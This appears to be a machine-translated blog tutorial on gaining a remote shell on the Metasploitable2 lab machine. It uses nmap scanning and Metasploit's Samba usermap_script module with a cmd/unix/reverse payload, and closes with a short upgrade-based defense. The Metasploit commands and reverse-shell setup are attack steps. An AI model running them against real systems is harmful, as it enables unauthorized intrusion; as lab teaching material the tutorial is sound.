Shulou(Shulou.com)06/01 Report--

This article mainly introduces "how to use samba service loopholes to obtain host shell". In daily operation, I believe many people have doubts about how to use samba service vulnerabilities to obtain host shell. Xiaobian consulted all kinds of materials and sorted out simple and easy-to-use operation methods. I hope it will be helpful to answer the doubts of "how to use samba service vulnerabilities to obtain host shell". Next, please follow the editor to study!

The running system of the target plane is metasploitable2, which is a special ubuntu operating system, which is mainly used for security tools to test and demonstrate common vulnerabilities.

1. Information collection

Use nmap to scan and view the open ports of the system and the corresponding applications, and the command is the nmap-sV target address, where s is scan,V and version.

two。 Loophole discovery

Check out samba3.X-4.X services running on ports 445 and 139. Samba is free software based on the SMB (server message block) protocol, and SMB is used to share printers and files on the local area network.

3. Vulnerability exploitation

Open the Metasploit tool and type search samba under msf to find exploitable vulnerability modules.

Select exploit/multi/samba/usermap_script because it is marked excellent, type use exploit/multi/samba/usermap_script, and use the module to view the payload under the module using the show payloads command.

Because the target machine is a linux machine, select the payload of linux, here select the basic cmd/unix/reverse reverse attack payload module, and select the command set payload cmd/unix/reverse.

Set the target machine address: set RHOST target machine address

Set vulnerable port: set RPORT 445

Set attack plane address: set LHOST attack plane address

Use the show options command to see if the configuration is correct.

Enter the exploit or run command to attack and successfully obtain the shell of the target host.

4. Summary

Take the penetration of linux system as an example, the penetration process of windows system is actually similar, but the combination of vulnerability modules and payloads that may be exploited may be different. Defense: this vulnerability can be defended by upgrading the samba service to the latest version.

At this point, the study on "how to use samba service vulnerabilities to obtain host shell" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.